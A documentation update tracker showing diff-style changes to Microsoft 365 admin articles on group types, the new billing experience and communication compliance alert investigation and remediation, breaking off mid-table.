Docs update tracker

Category	Microsoft Docs article	Related commit history on GitHub	Change details
admin	Compare Groups	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/create-groups/compare-groups.md	Title: "Compare groups"- Previously updated : 02/18/2020 + Title: Compare types of groups in Microsoft 365 + Last updated : 07/18/2023 f1.keywords: CSH search.appverid: - MET150 - MOE150 ms.assetid: 758759ad-63ee-4ea9-90a3-39f941897b7d -description: "Microsoft 365 Group members get a group email and shared workspace for conversations, files, and calendar events, Stream, and a Planner." +description: Learn about the types of groups that are available in Microsoft 365 -# Compare groups +# Compare types of groups in Microsoft 365 In the <a href="https://go.microsoft.com/fwlink/p/?linkid=2052855" target="_blank">Groups</a> section of the Microsoft 365 admin center, you can create and manage these types of groups: -- Microsoft 365 Groups are used for collaboration between users, both inside and outside your company. They include collaboration services such as SharePoint and Planner. +- Microsoft 365 Groups are used for collaboration between users, both inside and outside your company. They include collaboration services such as SharePoint and Planner. Microsoft Teams uses Microsoft 365 Groups for membership. - Distribution groups are used for sending email notifications to a group of people. - Security groups are used for granting access to resources such as SharePoint sites. - Mail-enabled security groups are used for granting access to resources such as SharePoint, and emailing notifications to those users. All of these group types can be used with Power Automate. ## Microsoft 365 Groups -Microsoft 365 Groups are used for collaboration between users, both inside and outside your company. With each Microsoft 365 Group, members get a group email and shared workspace for conversations, files, and calendar events, Stream, and a Planner. +Microsoft 365 Groups are used for collaboration between users, both inside and outside your company. With each Microsoft 365 group, members get a group email and shared workspace for conversations, files, and calendar events, Stream, and a Planner. Microsoft 365 Groups can also be connected to Teams or Viva Engage. You can add people from outside your organization to a group as long as this has been [enabled by the administrator](manage-guest-access-in-groups.md). You can also allow external senders to send email to the group email address. Microsoft 365 Groups can be accessed through mobile apps such as Outlook for iOS Group members can send as or send on behalf of the group email address if this has been [enabled by the administrator](../../solutions/allow-members-to-send-as-or-send-on-behalf-of-group.md). -Microsoft 365 groups support nesting through [dynamic groups in Azure Active Directory](/azure/active-directory/enterprise-users/groups-dynamic-rule-member-of). +Microsoft 365 Groups support nesting through [dynamic groups in Azure Active Directory](/azure/active-directory/enterprise-users/groups-dynamic-rule-member-of). Microsoft 365 Groups can be added to one of the three SharePoint groups (Owners, Members, or Visitors) to give people permissions to the site. Unlike regular distribution groups that contain a defined set of members, the me ## Security groups -[Security groups](../email/create-edit-or-delete-a-security-group.md) are used for granting access to Microsoft 365 resources, such as SharePoint. They can make administration easier because you need only administer the group rather than adding users to each resource individually. +[Security groups](../email/create-edit-or-delete-a-security-group.md) are used for granting access to Microsoft 365 resources, such as SharePoint sites. They can make administration easier because you need only administer the group rather than adding users to each resource individually. -Security groups can contain users or devices. Creating a security group for devices can be used with mobile device management services, such as Intune. +Security groups can contain users or devices. Creating a security group for devices can be used with mobile device management services, such as Microsoft Intune. Security groups can be [configured for dynamic membership in Azure Active Directory](/azure/active-directory/users-groups-roles/groups-change-type), allowing group members or devices to be added or removed automatically based on user attributes such as department, location, or title; or device attributes such as operating system version. Shared mailboxes include a calendar that can be used for collaboration. Users with permissions to the group mailbox can send as or send on behalf of the mailbox email address, if the administrator has given that user permissions to do that. This is especially useful for help and support mailboxes because users can send emails from "Contoso Support" or "Building A Reception Desk." -It's not possible to migrate a shared mailbox to a Microsoft 365 Group. +It's not possible to migrate a shared mailbox to a Microsoft 365 group. ## Related content
commerce	Billing Experience Overview	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/billing-experience-overview.md	+ + Title: "Overview of the new Microsoft billing experience for business subscriptions" +f1.keywords: +- CSH ++++ +audience: Admin ++ +ms.localizationpriority: medium + +- Tier1 +- scotvorg +- highpri +- M365-subscription-management +- Adm_O365 + +- commerce_billing +- VSBFY23 +- AdminTemplateSet +search.appverid: MET150 + +description: "Learn about the new billing experience for business subscription in the Microsoft 365 admin center." Last updated : 07/18/2023++ +# Overview of the new Microsoft billing experience for business subscriptions + +Microsoft has introduced new features that expand and improve the billing experience for our business customers. This article describes the major features weΓÇÖve added, and the changes weΓÇÖve made to the billing experience. + +If youΓÇÖre a Cloud Service Provider (CSP), see [New commerce license-based overview - Partner Center](/partner-center/new-commerce-license-based). + +## The Microsoft Customer Agreement + +The Microsoft Customer Agreement (MCA) is a new purchasing agreement that simplifies the experience of buying Microsoft products and services. The MCA is a fully digital agreement that doesnΓÇÖt expire and is automatically updated when you buy new products and services. To learn more about the MCA and for a list of frequently asked questions, see [Microsoft Customer Agreement \| Microsoft Licensing](https://www.microsoft.com/Licensing/how-to-buy/microsoft-customer-agreement). + +## Billing accounts + +You now have a billing account associated with your organization. This billing account is used to manage your account settings, invoices, payment methods, and purchases from Microsoft. Together with the MCA, you can use your billing account to buy products and services across different surfaces, including directly from Microsoft, through partners, and through field sales agents. You might have more than one billing account, depending on the types of agreement you signed with us. + +Billing accounts have special roles that you can assign to users in your organization. These roles let users do things like assign billing account permissions to other users, edit accounts, sign agreements, and view accounts. + +For more information, see [Understand your Microsoft business billing account](manage-billing-accounts.md). + +## Billing profiles + +You also now have a billing profile associated with your billing account. A billing profile contains payment method and invoice information and is used to pay for the products that you buy from us. If you have more than one billing profile, each billing profile is invoiced separately. + +Like billing accounts, billing profiles also have special roles that you can assign to users in your organization. These roles let users do things like assign billing profile roles, edit the billing profile group, use the billing profile in a purchase, pay bills, and view the billing profile group. + +For more information, see [Understand your Microsoft business billing profile](billing-and-payments/manage-billing-profiles.md). + +## Additional changes + +The following list describes other changes weΓÇÖve made to the billing experience. + +- New invoice—The format of the invoice has changed, and you now receive a separate invoice for each billing profile in your billing account. For more information, see [Understand your bill or invoice](billing-and-payments/understand-your-invoice.md). +- More billing frequencies—Depending on the product or service you buy, you can now choose to pay for your subscription monthly, yearly, or every three years. +- More subscription lengths—Depending on the product or service you buy, you can choose a subscription length of one month, one year, or three years. +- New cancellation policy—You can now only cancel and receive a prorated credit or refund if you cancel within seven days after the start or renewal of your subscription. If you cancel during this limited time window, the prorated amount is either credited towards your next invoice or returned to you in the next billing cycle. For more information, see [Cancel your Microsoft business subscription](subscriptions/cancel-your-subscription.md). +- New scheduling for license changes—You can now choose to increase or decrease the number of licenses you have for a subscription on the next subscription renewal date. +- New billing account selector—If you have more than one billing account, you can select Change billing account on the Purchase services page to use a different billing account to buy new products and services. + +## Related articles + +[Understand your Microsoft business billing account](manage-billing-accounts.md) (article)\ +[Understand your Microsoft business billing profile](billing-and-payments/manage-billing-profiles.md) (article)\ +[Understand your bill or invoice](billing-and-payments/understand-your-invoice.md) (article)\ +[How to pay for your Microsoft business subscription with a billing profile](billing-and-payments/pay-for-subscription-billing-profile.md) (article)
compliance	Communication Compliance Alerts Best Practices	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/communication-compliance-alerts-best-practices.md	f1.keywords: Previously updated : 04/14/2023 Last updated : 07/18/2023 audience: Admin f1_keywords: Messages in alerts include [sentiment evaluation](communication-compliance-inves ## Report messages as misclassified -[Reporting false positives as misclassified](communication-compliance-investigate-remediate.md#remediate-alerts) will help to improve MicrosoftΓÇÖs models and reduce the number of false positives that you see in the future. +[Reporting false positives as misclassified](communication-compliance-investigate-remediate.md#review-and-mediate-policy-matches-and-alerts) will help to improve MicrosoftΓÇÖs models and reduce the number of false positives that you see in the future. ## Filter out specific senders by using a condition
compliance	Communication Compliance Investigate Remediate	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/communication-compliance-investigate-remediate.md	f1.keywords: Previously updated : 02/07/2023 Last updated : 07/18/2023 audience: Admin f1_keywords: After you've configured your [communication compliance policies](/microsoft-365/ - The Communication Compliance Analysts or the Communication Compliance Investigators role group - Reviewer in the policy that is associated with the alert -After you establish required permissions, follow the workflow instructions below to investigate and remediate alert issues. +After you establish required permissions, follow the workflow instructions below to investigate and remediate issues. [!INCLUDE [purview-preview](../includes/purview-preview.md)] -## Investigate alerts +## Investigate policy matches and alerts -The first step to investigate issues detected by your policies is to review alerts in the Microsoft Purview compliance portal. There are several areas in the communication compliance area to help you to quickly investigate alerts, depending on how you prefer to view alert grouping: +The first step to investigate issues detected by your policies is to review policy matches and alerts in the Microsoft Purview compliance portal. There are several areas in the communication compliance area to help you to quickly investigate policy matches and alerts: -- Communication compliance policy page: When you sign into the [Microsoft Purview compliance portal](https://compliance.microsoft.com) using credentials for an admin account in your Microsoft 365 organization, select Communication compliance to display the communication compliance Policy page. This page displays communication compliance policies configured for your Microsoft 365 organization and links to recommended policy templates. Each policy listed includes the count of alerts that need review, the number of escalated and resolved items, status of the policy, and the date and Coordinated Universal Time (UTC) of the last policy check. Select a policy to display all pending alerts for matches to the policy, then select a specific alert to launch the policy details page and to start remediation actions.-- Alerts: Navigate to Communication compliance > Alerts to display the last 30 days of alerts grouped by policy matches. This view allows you to quickly see which communication compliance policies are generating the most alerts ordered by severity. To start remediation actions, select the policy associated with the alert to launch the Policy details page. From the Policy details page, you can review a summary of the activities on the Overview page, review and act on alert messages on the Pending tab, or review the history of closed alerts on the Resolved tab.-- Reports: Navigate to Communication compliance > Reports to display communication compliance report widgets. Each widget provides an overview of communication compliance activities and statuses, including access to deeper insights about policy matches and remediation actions. +- Policy page: When you sign into the [Microsoft Purview compliance portal](https://compliance.microsoft.com) using credentials for an admin account in your Microsoft 365 organization, select Communication compliance to display the communication compliance Policy page. This page displays communication compliance policies configured for your Microsoft 365 organization and links to recommended policy templates. Each policy listed includes the count of policy matches that need review (Items pending review column), the number of escalated and resolved items, status of the policy, the date and Coordinated Universal Time (UTC) of the last policy modification, and the UTC for the last policy scan. Select a policy to display all pending policy matches, and then select a specific policy match to launch the policy details page and start remediation actions. +- Alerts page: Go to Communication compliance > Alerts to display the last 30 days of alerts grouped by policy matches. This view allows you to quickly see which communication compliance policies are generating the most alerts ordered by severity. An alert is not the same thing as a policy match. An alert generally consists of multiple policy matches, not just one policy match. After the required number of policy matches is met for a particular alert, the alert is created and email is sent to the alert recipient. -> [!NOTE] -> If you select the Pending tab, you may notice that the count of policy matches in the Pending tab heading doesn't match the number of messages in the table (with attachments filtered out) in the lower part of the screen. This is due to new entries in the table that are not reflected in the Pending tab. Refresh the page to update both. + To start remediation actions, select the policy associated with the alert to launch the Policy details page. From the Policy details page, you can review a summary of the activities on the Overview page, review and act on policy matches on the Pending tab, or review the history of closed policy matches on the Resolved tab. + + > [!NOTE] + > You may notice that the count of policy matches in the Pending tab heading doesn't match the number of policy matches in the table (with attachments filtered out) in the lower part of the screen. This is due to new entries in the table that are not reflected in the Pending tab. Refresh the page to update both. + +- Reports page: Go to Communication compliance > Reports to display communication compliance report widgets. Each widget provides an overview of communication compliance activities and statuses, including access to deeper insights about policy matches and remediation actions. + +> [!TIP] +> Sometimes it's useful to quickly review policy settings without opening a policy. For example, if you're testing multiple policies with different conditions, you might want to save time by reviewing conditions for each policy to determine risk before opening the policy. You can do this by selecting the Policy settings button ![Policy settings button](../media/communication-compliance-policy-settings-button.png), which opens a panel where you can view the policy settings. If you're a member of the Communication Compliance or Communication Compliance Admins role group, you can view and change settings from the panel. If you're a member of the Communication Compliance Investigators or Communication Compliance Analysts role group, you can view settings but you can't change them. ### Using filters -The next step is to sort the messages so it's easier for you to investigate alerts. From the Policy details page, communication compliance supports multi-level filtering for several message fields to help you quickly investigate and review messages with policy matches. Filtering is available for pending and resolved items for each configured policy. You can configure filter queries for a policy or configure and save custom and default filter queries for use in each specific policy. After configuring fields for a filter, you'll see the filter fields displayed on the top of the alert message queue that you can configure for specific filter values. +The next step is to sort the messages so it's easier for you to investigate. From the Policy details page, communication compliance supports multi-level filtering for several message fields to help you quickly investigate and review messages with policy matches. Filtering is available for pending and resolved items for each configured policy. You can configure filter queries for a policy or configure and save custom and default filter queries for use in each specific policy. After configuring fields for a filter, you'll see the filter fields displayed on the top of the message queue that you can configure for specific filter values. + +Key filters (the Body/Subject, Date, Sender, and Tags filters) are always displayed on the Pending and Resolved tabs to make it easy to access those filters. -For the date filter, the date and time for events are listed in Coordinated Universal Time (UTC). When filtering messages for views, the requesting user's local date/time determines the results based on the conversion of the user's local date/time to UTC. For example, if a user in U.S. Pacific Daylight Time (PDT) filters a report from 8/30/2021 to 8/31/2021 at 00:00, the report includes messages from 8/30/2021 07:00 UTC to 8/31/2021 07:00 UTC. If the same user was in U.S. Eastern Daylight Time (EDT) when filtering at 00:00, the report includes messages from 8/30/2021 04:00 UTC to 8/31/2021 04:00 UTC. +For the Date filter, the date and time for events are listed in Coordinated Universal Time (UTC). When filtering messages for views, the requesting user's local date/time determines the results based on the conversion of the user's local date/time to UTC. For example, if a user in U.S. Pacific Daylight Time (PDT) filters a report from 8/30/2021 to 8/31/2021 at 00:00, the report includes messages from 8/30/2021 07:00 UTC to 8/31/2021 07:00 UTC. If the same user was in U.S. Eastern Daylight Time (EDT) when filtering at 00:00, the report includes messages from 8/30/2021 04:00 UTC to 8/31/2021 04:00 UTC. #### Filter details -Communication compliance filters allow you to filter and sort alert messages for quicker investigation and remediation actions. Filtering is available on the Pending and Resolved tabs for each policy. To save a filter or filter set as a saved filter query, one or more values must be configured as filter selections. +Communication compliance filters allow you to filter and sort messages for quicker investigation and remediation actions. Filtering is available on the Pending and Resolved tabs for each policy. To save a filter or filter set as a saved filter query, one or more values must be configured as filter selections. The following table outlines filter details: \|Filter\|Details\| \|:--\|:--\| +\| Body/Subject \| The message body or subject. You can use this filter to search for keywords or a keyword phrase in the body or subject of the message. The subject appears in the Subject column for email messages. For Teams messages, nothing appears in the Subject column.\| \| Date \| The date the message was sent or received by a user in your organization. To filter for a single day, select a date range that starts with the day you want results for and end with the following day. For example, if you wanted to filter results for 9/20/2020, you would choose a filter date range of 9/20/2020-9/21/2020.\| \| File class \| The class of the message based on the message type, either message or attachment. \| \| Has attachment \| The attachment presence in the message. \| \| Item class \| The source of the message based on the message type, email, Microsoft Teams chat, Bloomberg, etc. For more information, see [Item Types and Message Classes](/office/vba/outlook/concepts/forms/item-types-and-message-classes). \| -\| Recipient domains \| The domain to which the message was sent; typically your Microsoft 365 subscription domain by default. \| +\| Recipient domains \| The domain to which the message was sent; this is typically your Microsoft 365 subscription domain by default. \| \| Recipient \| The user to which the message was sent. \| \| Sender \| The person who sent the message. \| \| Sender domain \| The domain that sent the message. \| \| Size \| The size of the message in KB. \| -\| Subject/Title \| The message subject or chat title. \| \| Tags \| The tags assigned to a message, either Questionable, Compliant, or Non-compliant. \| \| Language \| The detected language of text in the message. The message is classified according to the language of the majority of the message text. For example, for a message containing both German and Italian text, but the majority of text is German, the message is classified as German (DE). For a list of supported languages, see [Learn about trainable classifiers](/microsoft-365/compliance/classifier-learn-about). <br><br> You can also filter by more than one language. For example, to filter messages classified as German and Italian, enter 'DE,IT' (the 2-digit language codes) in the Language filter search box. To view the detected language classification for a message, select a message, select View message details, and scroll to the EmailDetectedLanguage field. \| \| Escalated To \| The user name of the person included as part of a message escalation action. \| The following table outlines filter details: 4. On the Policy page, select either the Pending or Resolved tab to display the items for filtering. -5. Select the Filters control to open the Filters details page. +5. Select the Filters button to open the Filters details page. -6. Select one or more checkboxes to enable filters for these alerts. You can choose from numerous filters, including Date, Sender, Subject/Title, Classifiers, Language, and more. +6. Select one or more checkboxes to enable filters for these alerts. You can choose from numerous filters. 7. If you'd like to save the filter selected as the default filter, select Save as default. If you want to use this filter as a saved filter, select Done. -8. If you'd like to save the selected filters as a filter query, select Save the query control after you've configured at least one filter value. Enter a name for the filter query and select Save. This filter is available to use for only this policy and is listed in the Saved filter queries section of the Filters details page. +8. If you'd like to save the selected filters as a filter query, select the Save the query button after you've configured at least one filter value. Enter a name for the filter query and select Save. This filter is available to use for only this policy and is listed in the Saved filter queries section of the Filters details page. - ![Communication compliance filter detail controls](../media/communication-compliance-filter-detail-controls.png) + ![Communication compliance filter detail buttons](../media/communication-compliance-filter-detail-controls.png) -## Remediate alerts +## Review and mediate policy matches and alerts -No matter where you start to review alerts or the filtering you configure, the next step is to take action to remediate the alert. Start your alert remediation using the following workflow on the Policy or Alerts pages. +No matter where you start to review policy matches or alerts or the filtering you configure, the next step is to take remediation action. Start your remediation using the following workflow on the Policy or Alerts pages. ### Step 1: Examine the message basics - Sometimes it's obvious from the source or subject that a message can be immediately remediated. It may be that the message is spurious or incorrectly matched to a policy and it should be resolved as misclassified. Select the Report as misclassified control to share misclassified content with Microsoft, immediately resolve the alert, and remove from the pending alert queue. From the source or sender information, you may already know how the message should be routed or handled in these circumstances. Consider using the Tag as or Escalate controls to assign a tag to applicable messages or to send messages to a designated reviewer. + Sometimes it's obvious from the source or subject that a message can be immediately remediated. It may be that the message is spurious or incorrectly matched to a policy and it should be resolved as misclassified. Select the Report as misclassified button to share misclassified content with Microsoft, immediately resolve the issue, and remove from the Pending queue. From the source or sender information, you may already know how the message should be routed or handled in these circumstances. Consider using the Tag as or Escalate buttons to assign a tag to applicable messages or to send messages to a designated reviewer. -![Communication compliance remediation controls](../media/communication-compliance-remediation-controls.png) +![Communication compliance remediation buttons](../media/communication-compliance-remediation-controls.png) ### Step 2: Examine the message details After reviewing the message basics, now you can open a message to examine the details and determine further remediation actions. Select a message to view the complete message header and body information. Several different options and views are available to help you decide the proper course of action: -- Sentiment: Messages in alerts now include a sentiment evaluation to help investigators quickly prioritize potentially riskier messages to address first. Messages are flagged as Positive, Negative, or Neutral sentiment and are powered by [Azure Cognitive Service for Language](/azure/cognitive-services/language-service/overview). For some organizations, messages with Positive sentiment may be determined to be a lower priority, allowing reviewers to spend more time on other message alerts. The message sentiment is displayed in the Sentiment column and is enabled in the default view.-- Attachments: This option allows you to examine Modern attachments that match policy conditions. Modern attachments content is extracted as text and is viewable on the Pending alerts dashboard for a policy. For more information, see the [Communication compliance feature reference](/microsoft-365/compliance/communication-compliance-channels). +- Sentiment: Messages include a sentiment evaluation to help investigators quickly prioritize potentially riskier messages to address first. Messages are flagged as Positive, Negative, or Neutral sentiment and are powered by [Azure Cognitive Service for Language](/azure/cognitive-services/language-service/overview). For some organizations, messages with Positive sentiment may be determined to be a lower priority, allowing reviewers to spend more time on other messages. The message sentiment is displayed in the Sentiment column and is enabled in the default view. +- Attachments: This option allows you to examine Modern attachments that match policy conditions. Modern attachments content is extracted as text and is viewable on the Pending tab. For more information, see the [Communication compliance feature reference](/microsoft-365/compliance/communication-compliance-channels). - Source: This view is the standard message view commonly seen in most web-based messaging platforms. The header information is formatted in the normal style and the message body supports imbedded graphic files and word-wrapped text. If [optical character recognition (OCR)](/microsoft-365/compliance/communication-compliance-policies#optical-character-recognition-ocr) is enabled for the policy, images containing printed or handwritten text that match policy conditional are viewed as a child item for the associated message in this view. - Plain text: Text view that displays a line-numbered text-only view of the message and includes keyword highlighting in messages and attachments for sensitive info type terms, terms identified by built-in classifiers assigned to a policy, or for terms included in a dedicated keyword dictionary assigned to a policy. Keyword highlighting, which is currently available for English language only, can help direct you to the area of interest in long messages and attachments. In some cases, highlighted text might be only in attachments for messages matching policy conditions. Embedded files aren't displayed and the line numbering in this view is helpful for referencing pertinent details among multiple reviewers.-- Conversation: Available for Microsoft Teams chat messages, this view displays up to five messages before and after an alert message to help reviewers view the activity in the conversational context. This context helps reviewers to quickly evaluate messages and make more informed message resolution decisions. Real-time message additions to conversations are displayed, including all inline images, emojis, and stickers available in Teams. Image or text file attachments to messages aren't displayed. Notifications are automatically displayed for messages that have been edited or for messages that have been deleted from the conversation window. When a message is resolved, the associated conversational messages aren't retained with the resolved message. Conversation messages are available for up to 60 days after the alert message is identified. +- Conversation: Available for Microsoft Teams chat messages, this view displays up to five messages before and after a message to help reviewers view the activity in the conversational context. This context helps reviewers to quickly evaluate messages and make more informed message resolution decisions. Real-time message additions to conversations are displayed, including all inline images, emojis, and stickers available in Teams. Image or text file attachments to messages aren't displayed. Notifications are automatically displayed for messages that have been edited or for messages that have been deleted from the Conversation window. When a message is resolved, the associated conversational messages aren't retained with the resolved message. Conversation messages are available for up to 60 days after the message is identified. - User history: User history view displays all other alerts generated by any communication compliance policy for the user sending the message.-- Pattern detected notification: Many harassing and bullying actions over time involve reoccurring instances of the same behavior by a user. The Pattern detected notification is displayed in the alert details and raises attention to the alert. Detection of patterns is on a per-policy basis and evaluates behavior over the last 30 days when at least two messages are sent to the same recipient by a sender. Investigators and reviewers can use this notification to identify repeated behavior to evaluate the alert as appropriate.-- Translation: This view automatically converts alert message text to the language configured in the Displayed language setting in the Microsoft 365 subscription for each reviewer. This includes the text for the policy match as well as everything included in the conversation view (up to five messages before and five messages after the policy match). The Translation view helps broaden investigative support for organizations with multilingual users and eliminates the need for additional translation services outside of the communication compliance review process. Using Microsoft translation services, communication compliance automatically detects if the text is in a different language than the user's current system setting and will display alert message text accordingly. For a complete list of supported languages, see [Microsoft Translator Languages](https://www.microsoft.com/translator/business/languages/). Languages listed in the Translator Language List are supported in the Translation view. +- Pattern detected notification: Many harassing and bullying actions over time involve reoccurring instances of the same behavior by a user. The Pattern detected notification is displayed in the message details and raises attention to the message. Detection of patterns is on a per-policy basis and evaluates behavior over the last 30 days when at least two messages are sent to the same recipient by a sender. Investigators and reviewers can use this notification to identify repeated behavior to evaluate the message as appropriate. +- Translation: This view automatically converts message text to the language configured in the Displayed language setting in the Microsoft 365 subscription for each reviewer. This includes the text for the policy match as well as everything included in the conversation view (up to five messages before and five messages after the policy match). The Translation view helps broaden investigative support for organizations with multilingual users and eliminates the need for additional translation services outside of the communication compliance review process. Using Microsoft translation services, communication compliance automatically detects if the text is in a different language than the user's current system setting and will display alert message text accordingly. For a complete list of supported languages, see [Microsoft Translator Languages](https://www.microsoft.com/translator/business/languages/). Languages listed in the Translator Language List are supported in the Translation view. ### Step 3: Decide on a remediation action -Now that you've reviewed the details of the message for the alert, you can choose several remediation actions: +After reviewing the details of the message, you can choose several remediation actions: -- Resolve: Selecting the Resolve control immediately removes the message from the Pending alerts queue and no further action can be taken on the message. By selecting Resolve, you've essentially closed the alert without further classification. All resolved messages are displayed in the Resolved tab.-- Report as misclassified: You can always resolve a message as misclassified at any point during the message review workflow. Misclassified signifies that the alert was non-actionable or that the alert was incorrectly generated by the alerting process and any trainable classifiers. Resolving the item as misclassified sends message content, attachments, and the message subject (including metadata) to Microsoft to help improve trainable classifiers. Data that is sent to Microsoft doesn't contain information that may identify or be used to identify any users in your organization. Further actions canΓÇÖt be taken on the message and all misclassified messages are displayed in the Resolved tab.-- Power Automate: Use a Power Automate flow to automate process tasks for an alert message. By default, communication compliance includes the Notify manager when a user has a communication compliance alert flow template that reviewers can use to automate the notification process for users with message alerts. For more information about creating and managing Power Automate flows in communication compliance, see the Step 5: Consider Power Automate flows section in this article.-- Tag as: Tag the message as compliant, non-compliant, or as questionable as it relates to the policies and standards for your organization. Adding tags and tagging comments helps you micro-filter policy alerts for escalations or as part of other internal review processes. After tagging is complete, you can also choose to resolve the message to move it out of the pending review queue.-- Notify: You can use the Notify control to assign a custom notice template to the alert and to send a warning notice to the user. Choose the appropriate notice template configured in the Communication compliance settings area and select Send to email a reminder to the user that sent the message and to resolve the issue.-- Escalate: Using the Escalate control, you can choose who else in your organization should review the message. Choose from a list of reviewers configured in the communication compliance policy to send an email notification requesting additional review of the message alert. The selected reviewer can use a link in the email notification to go directly to items escalated to them for review.-- Escalate for investigation: Using the Escalate for investigation control, you can create a new [eDiscovery (Premium) case](/microsoft-365/compliance/overview-ediscovery-20) for single or multiple messages. You'll provide a name and notes for the new case, and user who sent the message matching the policy is automatically assigned as the case custodian. You don't need any additional permissions to manage the case. Creating a case doesn't resolve or create a new tag for the message. You can select a total of 100 messages when creating an eDiscovery (Premium) case during the remediation process. Messages in all communication channels included in communication compliance are supported. For example, you could select 50 Microsoft Teams chats, 25 Exchange Online email messages, and 25 Viva Engage messages when you open a new eDiscovery (Premium) case for a user.-- Remove message in Teams: Using the Remove message in Teams control, you can block potentially inappropriate messages and content identified in alerts from Microsoft Teams channels and 1:1 and group chats. This includes Teams chat messages reported by users and chat messages detected using machine-learning and classifier-based communication compliance policies. Removed messages and content are replaced with a policy tip that explains that it's blocked and the policy that applies to its removal from view. Recipients are provided a link in the policy tip to learn more about the applicable policy and the review process. The sender receives a policy tip for the blocked message and content but can review the details of the blocked message and content for context regarding the removal. +- Resolve: Selecting the Resolve button immediately removes the message from the Pending queue and no further action can be taken on the message. When you select Resolve, you close the message without further classification. All resolved messages are displayed in the Resolved tab. +- Report as misclassified: You can resolve a message as misclassified at any point during the message review workflow. "Misclassified" signifies that the message is non-actionable or that the message was incorrectly generated by the alerting process and any trainable classifiers. Resolving the item as misclassified sends the message content, attachments, and the message subject (including metadata) to Microsoft to help improve trainable classifiers. Data that is sent to Microsoft doesn't contain information that may identify or be used to identify any users in your organization. Further actions canΓÇÖt be taken on the message and all misclassified messages are displayed in the Resolved tab. +- Power Automate: Use a Power Automate flow to automate process tasks for a message. By default, communication compliance includes the Notify manager when a user has a communication compliance alert flow template that reviewers can use to automate the notification process for users with message alerts. For more information about creating and managing Power Automate flows in communication compliance, see the Step 5: Consider Power Automate flows section in this article. +- Tag as: Tag the message as compliant, non-compliant, or as questionable as it relates to the policies and standards for your organization. Adding tags and tagging comments helps you micro-filter messages for escalations or as part of other internal review processes. After tagging is complete, you can also choose to resolve the message to move it out of the pending review queue. +- Notify: Use the Notify button to assign a custom notice template to the message and send a warning notice to the user. Choose the appropriate notice template configured in the Communication compliance settings area and select Send to email a reminder to the user that sent the message and to resolve the issue. +- Escalate: Use the Escalate button to choose other people in your organization who should review the message. Choose from a list of reviewers configured in the communication compliance policy to send an email notification requesting additional review of the message. The selected reviewer can use a link in the email notification to go directly to items escalated to them for review. +- Escalate for investigation: Use the Escalate for investigation button to create a new [eDiscovery (Premium) case](/microsoft-365/compliance/overview-ediscovery-20) for single or multiple messages. Provide a name and notes for the new case. The custodian is automatically filled in for you. You don't need any additional permissions to manage the case. Creating a case doesn't resolve or create a new tag for the message. You can select a total of 100 messages when creating an eDiscovery (Premium) case during the remediation process. Messages in all communication channels included in communication compliance are supported. For example, you could select 50 Microsoft Teams chats, 25 Exchange Online email messages, and 25 Yammer messages when you open a new eDiscovery (Premium) case for a user. +- Remove message in Teams: Use the Remove message in Teams button to block potentially inappropriate messages and content identified in messages from Microsoft Teams channels and 1:1 and group chats. This includes Teams chat messages reported by users and chat messages detected using machine-learning and classifier-based communication compliance policies. Removed messages and content are replaced with a policy tip that explains that it's blocked and the policy that applies to its removal from view. Recipients are provided a link in the policy tip to learn more about the applicable policy and the review process. The sender receives a policy tip for the blocked message and content but can review the details of the blocked message and content for context regarding the removal. ### Step 4: Determine if message details should be archived outside of communication compliance -Message details can be exported or downloaded if you need to archive the messages in a separate storage solution. Selecting the Download control automatically adds selected messages to a .ZIP file that can be saved to storage outside of Microsoft 365. +Message details can be exported or downloaded if you need to archive the messages in a separate storage solution. Selecting the Download button automatically adds selected messages to a .ZIP file that can be saved to storage outside of Microsoft 365. ### Step 5: Consider Power Automate flows The following Power Automate template is provided to customers to support proces #### Create a Power Automate flow -To create a Power Automate flow from a recommended default template, you'll use the Manage Power Automate flows option from the Automate control when working directly in an alert. To create a Power Automate flow with Manage Power Automate flows, you must be a member of at least one communication compliance role group. +To create a Power Automate flow from a recommended default template, you'll use the Manage Power Automate flows option from the Automate button when working directly in an alert. To create a Power Automate flow with Manage Power Automate flows, you must be a member of at least one communication compliance role group. Follow these steps to create a Power Automate flow from a default template: Follow these steps to create a Power Automate flow from a default template: 3. Select Power Automate from the alert action menu. 4. On the Power Automate page, select a default template from the Communication compliance templates you may like section on the page. 5. The flow lists the embedded connections needed for the flow and displays if the connection statuses are available. If needed, update any connections that aren't displayed as available. Select Continue. -6. By default, the recommended flows are pre-configured with the recommended communication compliance and Microsoft 365 service data fields required to complete the assigned task for the flow. If needed, customize the flow components by using the Show advanced options control and configuring the available properties for the flow component. +6. By default, the recommended flows are pre-configured with the recommended communication compliance and Microsoft 365 service data fields required to complete the assigned task for the flow. If needed, customize the flow components by using the Show advanced options button and configuring the available properties for the flow component. 7. If needed, add any additional steps to the flow by selecting the New step button. In most cases, this change shouldn't be needed for the recommended default templates. 8. Select Save draft to save the flow for further configuration later, or select Save to complete the configuration for the flow. -9. Select Close to return to the Power Automate flow page. The new template will be listed as a flow on the My flows tab and is automatically available from the Power Automate control for the user that created the flow when working with communication compliance alerts. +9. Select Close to return to the Power Automate flow page. The new template will be listed as a flow on the My flows tab and is automatically available from the Power Automate button for the user that created the flow when working with communication compliance alerts. #### Share a Power Automate flow -By default, Power Automate flows created by a user are only available to that user. For other communication compliance users to have access and use a flow, the flow must be shared by the flow creator. To share a flow, use the Power Automate control when working directly in an alert. +By default, Power Automate flows created by a user are only available to that user. For other communication compliance users to have access and use a flow, the flow must be shared by the flow creator. To share a flow, use the Power Automate button when working directly in an alert. To share a Power Automate flow, you must be a member of at least one communication compliance role group. Follow these steps to share a Power Automate flow: #### Edit a Power Automate flow -If you need to edit a flow, you'll use the Power Automate control when working directly in an alert. To edit a Power Automate flow, you must be a member of at least one communication compliance role group. +If you need to edit a flow, you'll use the Power Automate button when working directly in an alert. To edit a Power Automate flow, you must be a member of at least one communication compliance role group. Follow these steps to edit a Power Automate flow: Follow these steps to edit a Power Automate flow: #### Delete a Power Automate flow -If you need to delete a flow, use the Power Automate control when working directly in an alert. To delete a Power Automate flow, you must be a member of at least one communication compliance role group. +If you need to delete a flow, use the Power Automate button when working directly in an alert. To delete a Power Automate flow, you must be a member of at least one communication compliance role group. Follow these steps to delete a Power Automate flow: Notices templates are custom email templates where you can define the following \|Field\|Required\| Details \| \|:--\|:--\|:--\| \|Template name \| Yes \| Friendly name for the notice template that you'll select in the notify workflow during remediation, supports text characters. \| -\| Sender address \| Yes \| Address of one or more users or groups that send the message to the user with a policy match, 